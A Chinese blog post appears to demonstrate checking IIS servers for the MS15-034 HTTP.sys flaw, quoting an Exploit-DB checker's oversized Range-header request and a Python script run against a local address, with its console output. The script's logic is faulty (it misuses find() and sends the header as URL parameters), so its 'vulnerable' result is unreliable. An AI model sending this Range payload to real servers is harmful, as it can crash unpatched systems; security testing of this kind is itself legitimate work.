美文网首页
渗透测试捕捉漏洞代码演示

渗透测试捕捉漏洞代码演示

作者: 幼姿沫 | 来源:发表于2020-09-18 19:51 被阅读0次

    1.
    Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034) 网站参考:

    https://www.exploit-db.com/exploits/36773

    文档中显示bug信息


    /*

    UNTESTED - MS15-034 Checker

    THE BUG:

    8a8b2112 56              push    esi

    8a8b2113 6a00            push    0

    8a8b2115 2bc7            sub    eax,edi

    8a8b2117 6a01            push    1

    8a8b2119 1bca            sbb    ecx,edx

    8a8b211b 51              push    ecx

    8a8b211c 50              push    eax

    8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here

    ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4

    BY: john.b.hale@gmai.com

    Twitter: @rhcp011235

    */

    // our evil buffer

    char request1[]="GET / HTTP/1.1\r\nHost: stuff\r\n

    Range: bytes=0-18446744073709551615\r\n\r\n";

    2.MS15-034测试方法连接网页

    https://blog.csdn.net/Jiajiajiang_/article/details/80742955

    3.代码测试捕捉bug信息

    #捕捉漏洞检测工具

    url='http://192.168.1.3/'

    r=requests.get(url)

    remote_request=r.headers['Server']

    if remote_request.find('IIS/10.0')or remote_request.find('IIS/8.5'):

    protype={'Host':'stuff','Range':'bytes = 0 - 18446744073709551615'}

    r1=requests.get(url,params=protype)

    print(r1.request.headers)

    print(r1.content)

    if str(r1.content).find('Requested Range Not Satisfiable'):

    print(url+' already exits')

    else:

    print(url+'not exits')

    else:

    print('Server not has IIS/10.0')

    4.

    1.获取url地址的方式

    2.控制台信息

    {'User-Agent': 'python-requests/2.23.0', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}

    b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />\r\n<title>IIS Windows</title>\r\n<style type="text/css">\r\n<!--\r\nbody {\r\n\tcolor:#000000;\r\n\tbackground-color:#0072C6;\r\n\tmargin:0;\r\n}\r\n\r\n#container {\r\n\tmargin-left:auto;\r\n\tmargin-right:auto;\r\n\ttext-align:center;\r\n\t}\r\n\r\na img {\r\n\tborder:none;\r\n}\r\n\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="container">\r\n<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>\r\n</div>\r\n</body>\r\n</html>'

    http://192.168.1.3/ already exits

    Microsoft-IIS/10.0

    网站路径显示信息

    相关文章

      网友评论

          本文标题:渗透测试捕捉漏洞代码演示

          本文链接:https://www.haomeiwen.com/subject/chzjyktx.html